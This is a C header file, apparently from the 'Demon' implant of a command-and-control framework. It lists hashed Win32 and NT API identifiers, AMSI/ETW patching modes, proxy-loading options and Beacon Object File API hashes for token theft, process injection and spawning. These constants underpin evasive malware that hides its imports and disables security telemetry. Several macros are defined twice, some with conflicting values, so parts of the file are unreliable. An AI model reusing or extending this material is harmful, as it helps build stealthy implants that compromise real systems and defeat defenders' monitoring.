#ifndef DEMON_STRINGS_H
#define DEMON_STRINGS_H

#define PROCESS_ARCH_UNKNOWN				0
#define PROCESS_ARCH_X86					1
#define PROCESS_ARCH_X64					2
#define PROCESS_ARCH_IA64					3

#ifdef _WIN64
#define PROCESS_AGENT_ARCH PROCESS_ARCH_X64
#else
#define PROCESS_AGENT_ARCH PROCESS_ARCH_X86
#endif

#define DEMON_MAGIC_VALUE 0xDEADBEEF

#define WIN_VERSION_UNKNOWN 0
#define WIN_VERSION_XP      1
#define WIN_VERSION_VISTA   2
#define WIN_VERSION_2008    3
#define WIN_VERSION_7       4
#define WIN_VERSION_2008_R2 5
#define WIN_VERSION_2008_R2 6
#define WIN_VERSION_2012    7
#define WIN_VERSION_8       8
#define WIN_VERSION_8_1     8.1
#define WIN_VERSION_2012_R2 9
#define WIN_VERSION_10      10
#define WIN_VERSION_2016_X  11

#define LDR_GADGET_MODULE_SIZE ( 0x1000 * 0x1000 )
#define LDR_GADGET_HEADER_SIZE ( 0x1000 )

#define PROXYLOAD_NONE             0
#define PROXYLOAD_RTLREGISTERWAIT  1
#define PROXYLOAD_RTLCREATETIMER   2
#define PROXYLOAD_RTLQUEUEWORKITEM 3

#define AMSIETW_PATCH_NONE   0
#define AMSIETW_PATCH_HWBP   1
#define AMSIETW_PATCH_MEMORY 2

/* Win32 Functions */
#define H_FUNC_LDRLOADDLL                            0x25f8b5f3
#define H_FUNC_LDRGETPROCEDUREADDRESS                0x1239bf66
#define H_FUNC_NTADDBOOTENTRY                        0xfce6b26
#define H_FUNC_NTALLOCATEVIRTUALMEMORY               0xb720829c
#define H_FUNC_NTFREEVIRTUALMEMORY                   0xe8de37b9
#define H_FUNC_NTUNMAPVIEWOFSECTION                  0x46edba7d
#define H_FUNC_NTWRITEVIRTUALMEMORY                  0x9f60a942
#define H_FUNC_NTSETINFORMATIONVIRTUALMEMORY         0xfec40fe9
#define H_FUNC_NTQUERYVIRTUALMEMORY                  0xed0a900d
#define H_FUNC_NTOPENPROCESSTOKEN                    0x4a69c649
#define H_FUNC_NTOPENTHREADTOKEN                     0xb7268d82
#define H_FUNC_NTQUERYOBJECT                         0x40b1b764
#define H_FUNC_NTTRACEEVENT                          0xb2775488
#define H_FUNC_NTOPENPROCESS                         0xc3d6e4c8
#define H_FUNC_NTTERMINATEPROCESS                    0x6435d8ff
#define H_FUNC_NTOPENTHREAD                          0xd8430461
#define H_FUNC_NTOPENTHREADTOKEN                     0xb7268d82
#define H_FUNC_NTSETCONTEXTTHREAD                    0x14fcbac0
#define H_FUNC_NTGETCONTEXTTHREAD                    0x827ef434
#define H_FUNC_NTCLOSE                               0x4ef6504d
#define H_FUNC_NTCONTINUE                            0x83edb7dc
#define H_FUNC_NTSETEVENT                            0x533b2465
#define H_FUNC_NTCREATEEVENT                         0xa12710ed
#define H_FUNC_NTWAITFORSINGLEOBJECT                 0x4e2aa9ec
#define H_FUNC_NTSIGNALANDWAITFORSINGLEOBJECT        0x2e1b3e9d
#define H_FUNC_NTGETNEXTTHREAD                       0x8117154e
#define H_FUNC_NTRESUMETHREAD                        0xdd1d6780
#define H_FUNC_NTSUSPENDTHREAD                       0xc143ad91
#define H_FUNC_NTDUPLICATEOBJECT                     0x7b351e09
#define H_FUNC_NTQUERYINFORMATIONTHREAD              0xa8d645cb
#define H_FUNC_NTCREATETHREADEX                      0x2ce21f60
#define H_FUNC_NTQUEUEAPCTHREAD                      0x882fb468
#define H_FUNC_NTQUERYSYSTEMINFORMATION              0x2ef838d8
#define H_FUNC_NTQUERYINFORMATIONTOKEN               0xced3e994
#define H_FUNC_NTQUERYINFORMATIONPROCESS             0xa6d25372
#define H_FUNC_NTSETINFORMATIONTHREAD                0x218e57a1
#define H_FUNC_NTSETINFORMATIONVIRTUALMEMORY         0xfec40fe9
#define H_FUNC_NTPROTECTVIRTUALMEMORY                0x663b7c38
#define H_FUNC_NTREADVIRTUALMEMORY                   0x6403f2b3
#define H_FUNC_NTFREEVIRTUALMEMORY                   0xe8de37b9
#define H_FUNC_NTTERMINATETHREAD                     0x3e8cdb8
#define H_FUNC_NTWRITEVIRTUALMEMORY                  0x9f60a942
#define H_FUNC_NTDUPLICATETOKEN                      0xbdf5ad3
#define H_FUNC_NTALERTRESUMETHREAD                   0x1c7c8fd8
#define H_FUNC_NTTESTALERT                           0x3a6f48f
#define H_FUNC_RTLALLOCATEHEAP                       0x18ef660a
#define H_FUNC_RTLREALLOCATEHEAP                     0xe6674921
#define H_FUNC_RTLFREEHEAP                           0xf1c6a687
#define H_FUNC_RTLEXITUSERPROCESS                    0x15b3c2df
#define H_FUNC_RTLRANDOMEX                           0x7f1224f5
#define H_FUNC_RTLRANDOMEX                           0xfd2ee6a5
#define H_FUNC_RTLRANDOMEX                           0xfd2ee6a5
#define H_FUNC_RTLNTSTATUSTODOSERROR                 0x9f566640
#define H_FUNC_RTLGETVERSION                         0x86324a8d
#define H_FUNC_RTLADDVECTOREDEXCEPTIONHANDLER        0xe3737039
#define H_FUNC_RTLREMOVEVECTOREDEXCEPTIONHANDLER     0x19c3a73e
#define H_FUNC_RTLCREATETIMERQUEUE                   0x11caade1
#define H_FUNC_RTLDELETETIMERQUEUE                   0xaf9cfa60
#define H_FUNC_RTLCREATETIMER                        0x9b499e9c
#define H_FUNC_RTLQUEUEWORKITEM                      0x2c5b523e
#define H_FUNC_RTLREGISTERWAIT                       0x3d160041
#define H_FUNC_RTLCAPTURECONTEXT                     0x229c1ec0
#define H_FUNC_RTLCOPYMAPPEDMEMORY                   0x1c3224b2
#define H_FUNC_RTLFILLMEMORY                         0x1ff4d07
#define H_FUNC_RTLEXITUSERTHREAD                     0x6660fb98
#define H_FUNC_RTLSUBAUTHORITYSID                    0xa6491c3a
#define H_FUNC_RTLSUBAUTHORITYCOUNTSID               0xac09383

#define H_FUNC_LOADLIBRARYW                          0xf8bc27a1
#define H_FUNC_GETCOMPUTERNAMEEXA                    0x1ce5803
#define H_FUNC_WAITFORSINGLEOBJECTEX                 0xb6acb947
#define H_FUNC_VIRTUALPROTECT                        0x6b28f3bd
#define H_FUNC_GETMODULEHANDLEA                      0x56d23188
#define H_FUNC_GETPROCADDRESS                        0x61a1656f
#define H_FUNC_GETCURRENTDIRECTORYW                  0x199e51a4
#define H_FUNC_FINDFIRSTFILEW                        0x794cd555
#define H_FUNC_FINDNEXTFILEW                         0xae7a50ec
#define H_FUNC_FINDCLOSE                             0x564e79ec
#define H_FUNC_FILETIMETOSYSTEMTIME                  0x564e245b
#define H_FUNC_SYSTEMTIMETOTZSPECIFICLOCALTIME       0xdd94241a
#define H_FUNC_OUTPUTDEBUGSTRINGA                    0x5e6bbd85
#define H_FUNC_DEBUGBREAK                            0x583ff641
#define H_FUNC_SYSTEMFUNCTION032                     0x1c7fcdb5
#define H_FUNC_LOOKUPACCOUNTSIDW                     0xc132553
#define H_FUNC_LOGONUSEREXW                          0xad587b67
#define H_FUNC_VSNPRINTF                             0xf5b3889f
#define H_FUNC_GETADAPTERSINFO                       0x14d0f3f5
#define H_FUNC_WINHTTPOPEN                           0xdf5b6e95
#define H_FUNC_WINHTTPCONNECT                        0x4b26bcd
#define H_FUNC_WINHTTPOPENREQUEST                    0xc5c98bbe
#define H_FUNC_WINHTTPSETOPTION                      0xd9342328
#define H_FUNC_WINHTTPSENDREQUEST                    0x8c95cc96
#define H_FUNC_WINHTTPRECEIVERESPONSE                0xc3876e95
#define H_FUNC_WINHTTPADDREQUESTHEADERS              0x55f6b091
#define H_FUNC_WINHTTPREADDATA                       0x520c6539
#define H_FUNC_WINHTTPQUERYHEADERS                   0x8cf5fb75
#define H_FUNC_WINHTTPCLOSEHANDLE                    0xbc915ac5
#define H_FUNC_WINHTTPGETIEPROXYCONFIGFORCURRENTUSER 0x39659552
#define H_FUNC_WINHTTPGETPROXYFORURL                 0x84dda1f
#define H_FUNC_VIRTUALPROTECTEX                      0xd934e03a
#define H_FUNC_LOCALALLOC                            0xf9ba870b
#define H_FUNC_LOCALREALLOC                          0x5df9e042
#define H_FUNC_LOCALFREE                             0x45a3a442
#define H_FUNC_CREATEREMOTETHREAD                    0x3a87112d
#define H_FUNC_CREATETOOLHELP32SNAPSHOT              0xa6b0bfe5
#define H_FUNC_PROCESS32FIRSTW                       0x8d75bb58
#define H_FUNC_PROCESS32NEXTW                        0xc6c88b0f
#define H_FUNC_CREATEPIPE                            0x1e483597
#define H_FUNC_CREATEPROCESSW                        0x7e81347f
#define H_FUNC_CREATEFILEW                           0xe699e2c0
#define H_FUNC_GETFULLPATHNAMEW                      0x246b744d
#define H_FUNC_GETFILESIZE                           0xf99df9d0
#define H_FUNC_GETFILESIZEEX                         0xd903b70d
#define H_FUNC_CREATENAMEDPIPEW                      0x1e277a33
#define H_FUNC_CONVERTFIBERTOTHREAD                  0xedfca7f9
#define H_FUNC_CREATEFIBEREX                         0xf3e891ae
#define H_FUNC_READFILE                              0x56ddf011
#define H_FUNC_VIRTUALALLOCEX                        0xda476104
#define H_FUNC_WAITFORSINGLEOBJECTEX                 0xb6acb947
#define H_FUNC_GETCOMPUTERNAMEEXA                    0x1ce5803
#define H_FUNC_EXITPROCESS                           0x4f70d82e
#define H_FUNC_GETEXITCODEPROCESS                    0xbd21f8e9
#define H_FUNC_GETEXITCODETHREAD                     0x8a7b9862
#define H_FUNC_CONVERTTHREADTOFIBEREX                0xe68c2016
#define H_FUNC_SWITCHTOFIBER                         0x8d502a72
#define H_FUNC_DELETEFIBER                           0x17db7950
#define H_FUNC_ALLOCCONSOLE                          0x7de4b233
#define H_FUNC_FREECONSOLE                           0x230330ea
#define H_FUNC_GETCONSOLEWINDOW                      0x89f59220
#define H_FUNC_GETSTDHANDLE                          0xdc6d52cc
#define H_FUNC_SETSTDHANDLE                          0x27d5b358
#define H_FUNC_WAITNAMEDPIPEW                        0xd37de034
#define H_FUNC_PEEKNAMEDPIPE                         0x4d851c0d
#define H_FUNC_DISCONNECTNAMEDPIPE                   0xf50746f2
#define H_FUNC_WRITEFILE                             0x5729d80
#define H_FUNC_CONNECTNAMEDPIPE                      0xc1379c12
#define H_FUNC_FREELIBRARY                           0xc8f672cc
#define H_FUNC_GETCURRENTDIRECTORYW                  0x199e51a4
#define H_FUNC_GETFILEATTRIBUTESW                    0x866a6d3
#define H_FUNC_FINDFIRSTFILEW                        0x794cd555
#define H_FUNC_FINDNEXTFILEW                         0xae7a50ec
#define H_FUNC_FINDCLOSE                             0x564e79ec
#define H_FUNC_FILETIMETOSYSTEMTIME                  0x564e245b
#define H_FUNC_SYSTEMTIMETOTZSPECIFICLOCALTIME       0xdd94241a
#define H_FUNC_REMOVEDIRECTORYW                      0x3478c04f
#define H_FUNC_DELETEFILEW                           0x17dba3df
#define H_FUNC_CREATEDIRECTORYW                      0x34e10e15
#define H_FUNC_COPYFILEW                             0x4d8988c7
#define H_FUNC_MOVEFILEEXW                           0x5173aea0
#define H_FUNC_SETCURRENTDIRECTORYW                  0xab747e30
#define H_FUNC_WOW64DISABLEWOW64FSREDIRECTION        0xf5f80ee8
#define H_FUNC_WOW64REVERTWOW64FSREDIRECTION         0x76f2894c
#define H_FUNC_GETMODULEHANDLEA                      0x56d23188
#define H_FUNC_GETSYSTEMTIMEASFILETIME               0x39b17fcc
#define H_FUNC_GETLOCALTIME                          0xb339276f
#define H_FUNC_DUPLICATEHANDLE                       0x72fa741c
#define H_FUNC_ATTACHCONSOLE                         0xb7f2dabd
#define H_FUNC_WRITECONSOLEA                         0x9f719214
#define H_FUNC_TERMINATEPROCESS                      0x718ac95d
#define H_FUNC_VIRTUALPROTECT                        0x6b28f3bd
#define H_FUNC_GETTOKENINFORMATION                   0xd110eedc
#define H_FUNC_CREATEPROCESSWITHTOKENW               0xb38211bc
#define H_FUNC_CREATEPROCESSWITHLOGONW               0xa0d6c5ba
#define H_FUNC_REVERTTOSELF                          0xb4476d3a
#define H_FUNC_GETUSERNAMEA                          0x3e5675f6
#define H_FUNC_LOGONUSERW                            0xe68921ca
#define H_FUNC_LOOKUPACCOUNTSIDA                     0xc13253d
#define H_FUNC_LOOKUPACCOUNTSIDW                     0xc132553
#define H_FUNC_OPENTHREADTOKEN                       0xbf4fea20
#define H_FUNC_OPENPROCESSTOKEN                      0x57beb6a7
#define H_FUNC_ADJUSTTOKENPRIVILEGES                 0xccfe593b
#define H_FUNC_LOOKUPPRIVILEGENAMEA                  0x60842d98
#define H_FUNC_SYSTEMFUNCTION032                     0x1c7fcdb5
#define H_FUNC_FREESID                               0xe29a8317
#define H_FUNC_SETSECURITYDESCRIPTORSACL             0x7602bebb
#define H_FUNC_SETSECURITYDESCRIPTORDACL             0x75fa850c
#define H_FUNC_INITIALIZESECURITYDESCRIPTOR          0x8a6fcd7e
#define H_FUNC_ADDMANDATORYACE                       0x7cb7a1b6
#define H_FUNC_INITIALIZEACL                         0x8bc03117
#define H_FUNC_ALLOCATEANDINITIALIZESID              0x5c4d49ff
#define H_FUNC_CHECKTOKENMEMBERSHIP                  0xf93ccc80
#define H_FUNC_SETENTRIESINACLW                      0x8b02b339
#define H_FUNC_SETTHREADTOKEN                        0x4cc63a1a
#define H_FUNC_LSANTSTATUSTOWINERROR                 0x2da8916
#define H_FUNC_EQUALSID                              0x21b5512d
#define H_FUNC_CONVERTSIDTOSTRINGSIDW                0x45054b87
#define H_FUNC_GETSIDSUBAUTHORITYCOUNT               0x945da751
#define H_FUNC_GETSIDSUBAUTHORITY                    0x23b90ea8
#define H_FUNC_LOOKUPPRIVILEGEVALUEA                 0x83b2de14
#define H_FUNC_SAFEARRAYACCESSDATA                   0xb77c44ff
#define H_FUNC_SAFEARRAYUNACCESSDATA                 0x4f0050c2
#define H_FUNC_SAFEARRAYCREATE                       0x30f299c7
#define H_FUNC_SAFEARRAYPUTELEMENT                   0xc3ed6736
#define H_FUNC_SAFEARRAYCREATEVECTOR                 0xd0e9011a
#define H_FUNC_SAFEARRAYDESTROY                      0x7ef4ba9d
#define H_FUNC_SYSALLOCSTRING                        0xb6238ef6
#define H_FUNC_COMMANDLINETOARGVW                    0x1c79c86
#define H_FUNC_SHOWWINDOW                            0xb16f14ce
#define H_FUNC_GETSYSTEMMETRICS                      0xa645b3b1
#define H_FUNC_GETDC                                 0x44e1c
#define H_FUNC_RELEASEDC                             0x835c9abd
#define H_FUNC_GETCURRENTOBJECT                      0x7c38b5ef
#define H_FUNC_GETOBJECTW                            0x280306e3
#define H_FUNC_CREATECOMPATIBLEDC                    0xe60e44d0
#define H_FUNC_CREATEDIBSECTION                      0xa9ec598d
#define H_FUNC_SELECTOBJECT                          0xd85babec
#define H_FUNC_BITBLT                                0xf52ca176
#define H_FUNC_DELETEOBJECT                          0x27cec6df
#define H_FUNC_DELETEDC                              0x8506be6f
#define H_FUNC_SETPROCESSVALIDCALLTARGETS            0xbd323de6
#define H_FUNC_CLRCREATEINSTANCE                     0x59f6fe3f
#define H_FUNC_GETADAPTERSINFO                       0x14d0f3f5
#define H_FUNC_NETLOCALGROUPENUM                     0xc7ffeac9
#define H_FUNC_NETGROUPENUM                          0x52da42fe
#define H_FUNC_NETUSERENUM                           0x695850d0
#define H_FUNC_NETWKSTAUSERENUM                      0xe9b5dcba
#define H_FUNC_NETSESSIONENUM                        0x74276b95
#define H_FUNC_NETSHAREENUM                          0x50a76444
#define H_FUNC_NETAPIBUFFERFREE                      0xe7177612
#define H_FUNC_WSASTARTUP                            0x9be1d573
#define H_FUNC_WSACLEANUP                            0xb9d3ba68
#define H_FUNC_WSASOCKETA                            0x905824aa
#define H_FUNC_WSAGETLASTERROR                       0x7923aade
#define H_FUNC_IOCTLSOCKET                           0x54063a59
#define H_FUNC_BIND                                  0x5552c912
#define H_FUNC_LISTEN                                0xc7ff704
#define H_FUNC_ACCEPT                                0xf261a0a5
#define H_FUNC_CLOSESOCKET                           0x96761554
#define H_FUNC_RECV                                  0x555b7cc5
#define H_FUNC_SEND                                  0x555c0a7f
#define H_FUNC_CONNECT                               0xf553e29f
#define H_FUNC_GETADDRINFO                           0xc9ae321c
#define H_FUNC_FREEADDRINFO                          0x44bc17fe
#define H_FUNC_LSAREGISTERLOGONPROCESS               0x988fd3d8
#define H_FUNC_LSALOOKUPAUTHENTICATIONPACKAGE        0x3cefc3bb
#define H_FUNC_LSADEREGISTERLOGONPROCESS             0xa4b054a1
#define H_FUNC_LSACONNECTUNTRUSTED                   0xde84fd2d
#define H_FUNC_LSAFREERETURNBUFFER                   0x524684d1
#define H_FUNC_LSACALLAUTHENTICATIONPACKAGE          0xc5a85bdd
#define H_FUNC_LSAGETLOGONSESSIONDATA                0x31bbe2f2
#define H_FUNC_LSAENUMERATELOGONSESSIONS             0xd69606f1
#define H_FUNC_SLEEP                                 0xe10b2e
#define H_FUNC_CREATETHREAD                          0xda6fa2c1
#define H_FUNC_AMSISCANBUFFER                        0x3d8573de
#define H_FUNC_GLOBALFREE                            0xcf3bb248
#define H_FUNC_SWPRINTF_S                            0xcfcdef84


// Beacon API
#define H_COFFAPI_BEACONDATAPARSER                  0xe2494ba2
#define H_COFFAPI_BEACONDATAINT                     0x77580242
#define H_COFFAPI_BEACONDATASHORT                   0xae133b27
#define H_COFFAPI_BEACONDATALENGTH                  0x5fef7f39
#define H_COFFAPI_BEACONDATAEXTRACT                 0x6fcc0b12

#define H_COFFAPI_BEACONFORMATALLOC                 0x9e9dfcd1
#define H_COFFAPI_BEACONFORMATRESET                 0x9fcde349
#define H_COFFAPI_BEACONFORMATFREE                  0x716c7948
#define H_COFFAPI_BEACONFORMATAPPEND                0x72a8019e
#define H_COFFAPI_BEACONFORMATPRINTF                0x95c5e479
#define H_COFFAPI_BEACONFORMATTOSTRING              0xa8aba0
#define H_COFFAPI_BEACONFORMATINT                   0x36ff0f1

#define H_COFFAPI_BEACONPRINTF                      0xcb7434d0
#define H_COFFAPI_BEACONOUTPUT                      0xc95b668e
#define H_COFFAPI_BEACONUSETOKEN                    0x5aad5f0b
#define H_COFFAPI_BEACONREVERTTOKEN                 0x44676796
#define H_COFFAPI_BEACONISADMIN                     0x20e1f142
#define H_COFFAPI_BEACONGETSPAWNTO                  0xb0aa89e9
#define H_COFFAPI_BEACONSPAWNTEMPORARYPROCESS       0x7a222308
#define H_COFFAPI_BEACONINJECTPROCESS               0xa9d12eb9
#define H_COFFAPI_BEACONINJECTTEMPORARYPROCESS      0xef8a4a3c
#define H_COFFAPI_BEACONCLEANUPPROCESS              0xe6577104
#define H_COFFAPI_BEACONINFORMATION                 0x99a62be3
#define H_COFFAPI_BEACONADDVALUE                    0x60a68f83
#define H_COFFAPI_BEACONGETVALUE                    0x5c7e539a
#define H_COFFAPI_BEACONREMOVEVALUE                 0x77a1dae8
#define H_COFFAPI_BEACONDATASTOREGETITEM            0x4dbb9c93
#define H_COFFAPI_BEACONDATASTOREPROTECTITEM        0x3139dd4
#define H_COFFAPI_BEACONDATASTOREUNPROTECTITEM      0x95d1237
#define H_COFFAPI_BEACONDATASTOREMAXENTRIES         0xc4373464
#define H_COFFAPI_BEACONGETCUSTOMUSERDATA           0x4559051

#define H_COFFAPI_TOWIDECHAR                        0xe49fb27f
#define H_COFFAPI_LOADLIBRARYA                      0xf8bc278b
#define H_COFFAPI_GETPROCADDRESS                    0x61a1656f
#define H_COFFAPI_GETMODULEHANDLE                   0x5a153f58
#define H_COFFAPI_FREELIBRARY                       0xc8f672cc
#define H_COFFAPI_LOCALFREE                         0x45a3a442

#define H_COFFAPI_NTOPENTHREAD                      0xd8430461
#define H_COFFAPI_NTOPENPROCESS                     0xc3d6e4c8
#define H_COFFAPI_NTTERMINATEPROCESS                0x6435d8ff
#define H_COFFAPI_NTOPENTHREADTOKEN                 0xb7268d82
#define H_COFFAPI_NTOPENPROCESSTOKEN                0x4a69c649
#define H_COFFAPI_NTDUPLICATETOKEN                  0xbdf5ad3
#define H_COFFAPI_NTQUEUEAPCTHREAD                  0x882fb468
#define H_COFFAPI_NTSUSPENDTHREAD                   0xc143ad91
#define H_COFFAPI_NTRESUMETHREAD                    0xdd1d6780
#define H_COFFAPI_NTCREATEEVENT                     0xa12710ed
#define H_COFFAPI_NTCREATETHREADEX                  0x2ce21f60
#define H_COFFAPI_NTDUPLICATEOBJECT                 0x7b351e09
#define H_COFFAPI_NTGETCONTEXTTHREAD                0x827ef434
#define H_COFFAPI_NTSETCONTEXTTHREAD                0x14fcbac0
#define H_COFFAPI_NTQUERYINFORMATIONPROCESS         0xa6d25372
#define H_COFFAPI_NTQUERYSYSTEMINFORMATION          0x2ef838d8
#define H_COFFAPI_NTWAITFORSINGLEOBJECT             0x4e2aa9ec
#define H_COFFAPI_NTALLOCATEVIRTUALMEMORY           0xb720829c
#define H_COFFAPI_NTWRITEVIRTUALMEMORY              0x9f60a942
#define H_COFFAPI_NTFREEVIRTUALMEMORY               0xe8de37b9
#define H_COFFAPI_NTUNMAPVIEWOFSECTION              0x46edba7d
#define H_COFFAPI_NTPROTECTVIRTUALMEMORY            0x663b7c38
#define H_COFFAPI_NTREADVIRTUALMEMORY               0x6403f2b3
#define H_COFFAPI_NTTERMINATETHREAD                 0x3e8cdb8
#define H_COFFAPI_NTALERTRESUMETHREAD               0x1c7c8fd8
#define H_COFFAPI_NTSIGNALANDWAITFORSINGLEOBJECT    0x2e1b3e9d
#define H_COFFAPI_NTQUERYVIRTUALMEMORY              0xed0a900d
#define H_COFFAPI_NTQUERYINFORMATIONTOKEN           0xced3e994
#define H_COFFAPI_NTQUERYINFORMATIONTHREAD          0xa8d645cb
#define H_COFFAPI_NTQUERYOBJECT                     0x40b1b764
#define H_COFFAPI_NTCLOSE                           0x4ef6504d
#define H_COFFAPI_NTSETINFORMATIONTHREAD            0x218e57a1
#define H_COFFAPI_NTSETINFORMATIONVIRTUALMEMORY     0xfec40fe9
#define H_COFFAPI_NTGETNEXTTHREAD                   0x8117154e

#define H_MODULE_KERNEL32                           0x26270ba0
#define H_MODULE_NTDLL                              0xf8996303

#endif
